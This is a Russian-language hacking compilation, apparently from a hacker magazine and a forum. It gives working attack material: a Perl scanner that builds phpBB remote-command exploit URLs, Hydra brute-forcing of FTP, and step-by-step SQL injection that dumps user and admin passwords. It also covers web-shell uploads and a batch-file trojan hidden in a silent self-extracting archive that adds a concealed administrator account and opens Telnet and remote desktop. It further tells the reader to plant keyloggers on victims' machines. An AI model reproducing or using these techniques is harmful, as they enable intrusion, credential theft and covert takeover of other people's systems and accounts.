Ещё одна старая уязвимость состояла в том, что при активированном ICQ homepage, был возможен доступ к локальным файлам, используя обратный путь к директориям. Начиная с 99-х версий, ICQ предоставляет пользователям новую, достаточно удобную и простую в реализации возможность — создать небольшой персональный веб-сервер. При этом, от пользователя требуется минимум усилий — достаточно выбрать в меню Services -> My ICQ Page -> Activate Homepage. При этом открывается доступ к виртуальному серверу, который по умолчанию расположен на 80 порту компьютера пользователя. Причём этот сервер, без всякой настройки, способен выполнить большинство функций, необходимых типичной домашней страничке. И все бы было хорошо, если бы ни одно: в ранних версиях icq 9 9 был возможен доступ к любому файлу на компьютере пользователя, используя адреса вида: http://текущий.ip.адрес.пользователя/.html……./config.sys. Вообще говоря, обратный путь — одна из самых типичных ошибок http-серверов. Практически все известные веб-сервера имели тот или иной вариант этой ошибки в своих ранних версиях, и ICQ не стало исключением. Лишь начиная с версии 3.19 эта дыра была закрыта, и всесто доступа к файлам пользователя, обращение к подобным адресам стало приводить к стандартной ошибке 403 Forbidden. Тем не менее, пользователей со старыми версиями ICQ всё ещё можно встретить в сети.

Способ #13
Если у вас есть прямой доступ к компьютеру, на котором стоит интересующая вас ася (или находится любая другая нужная вам информация), просто принести на дискете и установите клавиатурного шпиона, например SAM 007, когда жертва не будет видеть. Вы сможете узнать что, где и когда набиралось на клавиатуре. У вас в руках будет вся интересующая вас информация.

Способ #14
В конце концов, ICQ UIN можно просто купить. При этом ваша совесть будет почти чиста — вы можете искренне убеждать себя, что купленный вами номер с самого начала принадлежал продавцу и не является краденым. Правда, в этом случае вы должны всегда быть готовы к тому, что в один прекрасный день объявится законный владелец вашего «нового» UINa, и деньги заплаченные за него, окажутся выброшенными на ветер. Да и никто не даст вам гарантию, что после успешно завершённой сделки, UIN не будет украден повторно, на этот раз уже у вас

Ломаем невзламываемое
Итак, задача взломщика на первом этапе сводится к получению шелл-доступа к серваку, на котором крутится ломаемый сайт. Что же делать, если атакуемый ресурс содержит скрипты, в которых напрочь отсутствуют баги, а все демоны, запущенные на сервере, пропатчены? На первый взгляд, ситуация безвыходная – сайт взломать невозможно. Но «невозможно» — это всего лишь громкое слово, за которым прячутся слабаки и неудачники. Выход в этой ситуации следующий: необходимо найти и поломать другой уязвимый сайт, расположенный на том же сервере, где находится и сайт-жертва, чтобы получить шелл-доступ. Где же намутить список всех сайтов, которые расположены на хостинге? Существует два способа. Если у хостера есть каталог клиентских сайтов, то можно найти через него уязвимый ресурс. Но это слишком нудный, глупый и непрактичный метод по сравнению со вторым.
Идеально было бы иметь огромную таблицу, связывающую доменные имена и IP-адреса в масштабе всей Сети. Однако в силу совершенно другой, более сложной и распределенной структуры DNS, это вряд ли возможно. По крайней мере, не обладая огромными ресурсами, создать такую таблицу непросто (здесь под таблицей я, конечно, не подразумеваю реальную таблицу в БД — конкретную реализацию мы не обсуждаем). Однако ничего и не надо создавать: проблема давным-давно уже решена. Недавно на сайте www.domainsdb.net открылся сервис, позволяющий легко и быстро получить список всех виртуальных доменов, которые хостятся на одном сервере с указанным в поиске сайтом.

DomainsDB.net
DomainsDB.net – это просто чудо-находка для хакера! Зарегистрировавшись на сервисе, хакер сможет получить список сайтов, хостящихся на произвольном указанном им сервере.
Представь, что кибер-мерзавцу нужно поломать какой-нибудь простой сайт, например www.zhopa.net. И вот что он сделает для этого. Сначала сетевой падонак зайдет на www.domainsdb.net и зарегистрируется. После этого он перейдет на главную страницу сервиса, введет в поле Lookup доменное имя zhopa.net и нажмет на кнопку Enter. Появится страница, содержащая фразу «There are 748 domains on this IP, click here to get them all». Теперь ему нужно кликнуть на ссылку «Click here», и перед ним появится список доменов, которым назначен IP-адрес 64.237.57.92, то есть тот IP, на который ссылается сам zhopa.net . Посуди сам: раз все домены из полученного списка ссылаются на один IP-адрес, значит, сайты, принадлежащие этим доменам, находятся на одном сервере с сайтом www.zhopa.net. Поэтому чтобы получить шелл-доступ к серверу, на котором хостится www.zhopa.net, хакеру нужно поломать хотя бы один сайт из списка, который сгенерил сервис www.domainsdb.net, а это уже очень легко.

Выбираем баг
Несколько месяцев назад был обнаружен баг в движке известного форума phpBB – копатель-ковырятель, выявивший уязвимость, не поленился исследовать кучу php-скриптов на предмет некомпетентного использования функции system(). Уязвимыми оказались все версии до 2.0.10 включительно — любой скрипткидис запросто может поиметь шелл-доступ к серверу, если на сайте установлен дырявый phpBB. Если помнишь, об этой прорехе в январском номере писали наши сестры милосердия . Форум пользуется бешеной популярностью — по приблизительным наблюдениям он стоит на каждом сотом сайте в Сети. Если сервис www.domainsdb.net нашел сайтов сто на целевом сервере, то вероятность того, что на хостинге найдется какая-нибудь веб-пага с бажным phpBB, чрезвычайно высока.

Вернемся к первоначальной цели взломщика — к сайту www.zhopa.net. Кибер-падонок может вручную исследовать сайты из списка на наличие дырявого форума phpBB и найти таковой. Но это может отнять немало времени и сил, которых сайт www.zhopa.net вряд ли стоит.

Пишем крякер инета
Зачем делать монотонную, нудную работу, которую компьютер может сделать за тебя? Безусловно, в данной ситуации хакеру гораздо проще написать программку на перле, которая сама будет тусить по сайтам из сгенерированного сервисом www.domainsdb.net списка и искать форум phpBB. Только представь! Взломщик всего один раз потратит время на ее написание, а пользоваться сможет в любое время сколько угодно раз! Сейчас я попробую реализовать его задумку.
Сорцы скрипта
Код
use LWP::UserAgent;
$source=»in.txt»; $result=»result.htm»;
open (FILE, $source);
while ($str=)
{ if($str=~/[whois]/igs)
{ @str=split (» «, $str);
$site=$str[1];
$url=»http://www.$site/forum»;
find_bug($url,$result);
$url=»http://www.$site/phpbb»;
find_bug($url,$result);
$url=»http://www.$site/phpBB»;
find_bug($url,$result);
$url=»http://forum.$site»;
find_bug($url,$result);
$i++; print «$i: $siten»;
}
}
sub find_bug
{ $url=shift;
$result=shift;
open (RES, «>>$result»);
$browser = LWP::UserAgent->new;
$res=$browser->get($url);
if($res->content =~/viewforum.php/igs)
{ $exploit=»$url/viewtopic.php?t=7&highlight=%2527.$poster=%60$cm d%60.%2527&cmd=uname%20-a»;
print RES «<$exploit>n
$webpage
«;
}
close (RES);
}
Ну вот и все, самописный крякер инета создан и готов к работе! Прежде чем его запустить, нужно сохранить текст web-страницы со списком доменов с сервиса www.domainsdb.net в файле in.txt. После того как программка закончит работу, в файле result.htm не только появится листинг найденных phpBB-форумов, но и ссылки-эксплойты, дающие хакеру доступ к web-шеллу на сайте с бажным phpBB.

Локальный взлом
Если удача улыбнется хакеру, то желанный уязвимый форум найдется и, следовательно, компьютерный негодяй получит возможность исполнять через него команды операционной системы. Но что он будет делать дальше? Ведь хакер не сможет ни изменять, ни даже читать файлы, относящиеся к сайту www.zhopa.net, поскольку шелл получен через бажную хоум-пагу постороннего юзера. Для этого ему придется поломать аккаунт пользователя, которому принадлежит сайт zhopa.net. Про методы локального взлома можно написать не одну статью, но сейчас я расскажу только об одной технологии – о локальном брутфорсе. Для ее реализации падонок сначала выудит из файла /etc/passwd логин целевого пользователя (в нашем случае логин владельца жопа.нет), потом установит на сервер многофункциональный брутфорсер Hydra и начнет с его помощью подбор пароля к FTP/SSH, MySQL-сервису, которым владеет атакуемый юзер. О том, как устанавливать гидру, я уже повествовал пару номеров назад, поэтому сейчас расскажу только о том, как можно юзать ее в данном случае.
Итак, взломщику придется приготовить файл с потенциальными паролями, которые будут использоваться для брута. Он может либо скачать уже готовую подборку паролей с NSD.ru (http://nsd.ru/soft.php?group=hacksoft&razdel=passwords), либо составить свой персональный пасс-лист. Допустим, наш взломщик сохранил пароли в файле pass.txt. Теперь ему нужно натравить гидру на аккаунты zhopa.net, запустив перебор вот так:
hydra -l логин_от_жопа_нет -P pass.txt –t 255 127.0.0.1 ftp
После этого начнется брутфорс-атака FTP-сервиса, использующая 255 потоков. Поскольку взламываемый сервис является локальным, скорость перебора будет максимально высокой и пароль будет очень скоро получен. Если, конечно, перебор не запалит администратор сервера .

Подытожим
Что после всего вышеописанного можно сказать? Все сайты, расположенные на shared-хостингах, увы, уязвимы. Хакеру достаточно запустить наш крякер, и он в считанные минуты получит шелл-доступ к серверу. А security-умелец в момент поднимет свои права до рутовых, после чего сможет сделать с системой все что угодно.

Мнение разработчика сервиса
Служба DomainsDB.net содержит много всевозможной и постоянно обновляемой и пополняемой статистики, сделанной на основе информации о 50 миллионах доменов.
Сервис будет полезен веб-мастерам, интернет-маркетологам, секьюрити-аналитикам и другим IT-специалистам.

Как создать такую базу?
В самом деле, интересно, как же работает этот сервис? Как я уже говорил в статье, идеальным было бы иметь огромную такую табличку с полями «IP-адрес» и «Домен». Оттуда запросом вроде select * from addr where ip=’210.10.40.61’ можно было бы получить все домены, хостящиеся на указанном сервере. Однако, увы, такое наивное решение едва ли реализуемо. Как же быть?
Разумно предположить, что сама служба DNS предоставляет решение этой задачи, однако это не так. Конечно, в DNS есть такое понятие, как файл обратного просмотра, который устанавливает однозначное соответствие между IP-адресами и именами в зоне, однако это не может решить проблему. Единственный путь здесь – это действительно создать огромную базу данных со всеми (ну почти со всеми) доменными именами и IP-адресами. На практике все выглядит не так уж и устрашающе. Давай прикинем, сколько будет весить такая вот база. По самым щедрым оценкам, в инете 70 миллионов доменов второго уровня. Пусть на каждую запись будет отводиться по 300 байт, в этом случае объем базы будет всего-навсего 20 гигабайт. Вполне земные цифры, согласись. Конечно, если уж собирать такую статистику, то необходимо хранить также информацию о динамике, обладать сведениями, как меняется картина во времени. Но все равно создать такую базу вполне реально, для этого не нужно иметь огромный вычислительный кластер, и это проще, чем могло показаться на первый взгляд. Правда, конечно, потребуется большое количество интернет-трафика .

http://example.org/script.php?id=5

ставим кавычку

http://example.org/script.php?id=5

Если она не фильтруется то выйдет ошибка:
(Warning: mysql(): supplied argument is not a valid MySQL result resource in)
Далее идет вычисление полей в таблице с помощью параметра ORDER BY
http://example.org/script.php?id=5+ORDER+BY+ предполагаемое количество полей —
Предположим полей 7 из них 3 выводятся на сайте.

http://example.org/script.php?id=-5+ORDER+BY+1,2,3,4,5,6,7—

Выводятся поля 3, 5. Узнаем версию базы MySQL с помощью version()

http://example.org/script.php?id=-5+ORDER+…sion(),4,5,6,7—

На сайте в 3м поле будет написана версия базы. Предположим это 5 версия.
Во всех версиях выше 4 ой есть универсальные таблицы INFORMATION_SCHEMA.TABLES и поле TABLE_NAME.
INFORMATION_SCHEMA.COLUMNS и поле COLUMN_NAME
http://example.org/script.php?id=-5+ORDER+BY+1,2, TABLE_NAME,4,5,6,7+FROM+INFORMATION_SCHEMA.TABLES—
Теперь в 3м поле выдут все таблицы которые находятся в базе.

http://example.org/script.php?id=-5+ORDER+…SCHEMA.COLUMNS—

Все колонки находящиеся в таблицах.
Далее находим таблицу например users и поле например user_name, user_pass, user_email, user_mobile, user_address
Составляем запрос

http://example.org/script.php?id=-5+ORDER+…6,7+FROM+users—

И в 3м поле выходит полная информация о пользователе. Параметр user_pass то есть пароль пользователя выйдет в зашифрованном виде (алгаритм md5 чаще всего) 446f9bce9cd9e51771f60b6e9a12108b после расшифровки пароль примет следующий вид предположим 123923993838.
Остальные поля понятны.
То же самое и с таблицей admin, только пароль после расшифровки можно использовать для авторизации к сайту как администратор. Чаще всего админки сайтов лежат по адресу http://example.org/admin/ или /administrator/
Имея доступ к адмике сайта можно использовать уязвимость типо PHP – injection
То есть залить на сервер шелл.( спец php скрипт дающий полный доступ к серверу и хостингу в общем, тое есть если на сервере находиться не один сайт а 50 – 100 то с его помощью можно получить доступ к редактированию всех сайтов и управлении операционной системы сервера) на пример r57shell или c99madshell.
Найти подобную уязвимость на сайтах не трудно нужно всего лишь ввести в google.com
запрос: inurl:news.php?id=5 site:kz Warning: mysql
По запросу выйдет очень много уязвимых сайтов находящихся в Казахстане.
Взлом компьютера.
Есть очень много способов, но я расскажу об универсальном, с его помощью можно будет получить полный доступ к компьютеру вплоть до подключения к рабочему столу.
Для начала создается спец файл и который маскируется под архив и и методом соц. Инженерии “впаривается” через любой доступный метод на компьютер “жертвы”
После того как архив закачен на компьютер и открыт запускается BAT файл который открывает доступ к компьютеру через telnet. Зная IP адрес уязвимой машины можно проникнуть в него и скачать любой файл. При этом вирусная опасность будет нулевая!
Пример
.bat файл
chcp 1251
net user coolz 12333 /add
net localgroup Администраторы coolz /add
net localgroup Administrators coolz /add
net stop sharedaccess
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
Создается отдельный пользователь в системе coolz и задается пароль 12333
Далее присваиваются права администратора. И открывается порт 972.
За тем выбираешь файл который нужно “впарить” пусть это будет картинка 1.jpg
Выбирается картинка и пакуется в sfx архив, далее выделяете картинку (1.exe в архиве) и “батник” (1.bat)
нажимаешь добавить в архив. Ставишь галку создать SFX архив потом нажимаешь во вкладку дополнительно и выбираешь пара
метры SFX
Путь для распаковки пишешь: %WinDir%temp
В окошке выполнять после распаковки
пишем наш архив с картинкой. 1.exe
Заводим во вкладку режимы выбираем скрыть все нажимаем ок
Теперь заходим во вкладку комментарий
И где написано ввести комментарий вручную После строчки SavePath добавляем Setup=cool.bat
Внешний вид
Path=%WinDir%temp
SavePath
Setup=cool.bat
Setup=1.exe
Silent=1
Нажимаем ОК
Все замаскированный архив с батником готов
То есть после того как открывается архив выполняется бат файл за тем открывается картинка
После подключения к компьютеру можно открыть доступ к удаленному управлению
Для этого в командной строке вводятся следующие параметры
chcp 1251
net localgroup Пользователи удаленного рабочего стола coolz /add
net accounts /maxpwage:unlimited
REG ADD «HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList» /v «coolz» /t REG_DWORD /d 0 /f
net stop sharedaccess
sc config sharedaccess start= disabled
sc config tlntsvr start= auto
Все доступ открыт. Подключаемся к компьютеру с помощью Подключение к удаленному рабочему столу.
Водим логин пароль и всё. Загружается рабочий стол уязвимой машины. В дальнейшем можно загрузить сниффер и узнать все пароли. (ICQ, mail адрес и. т. д.)

О взломе ящика скажу коротко.
Есть 3 способа взлома:
1й перебор пароля по словарю
2й использование XSS уязвимости
3й соц.инженерия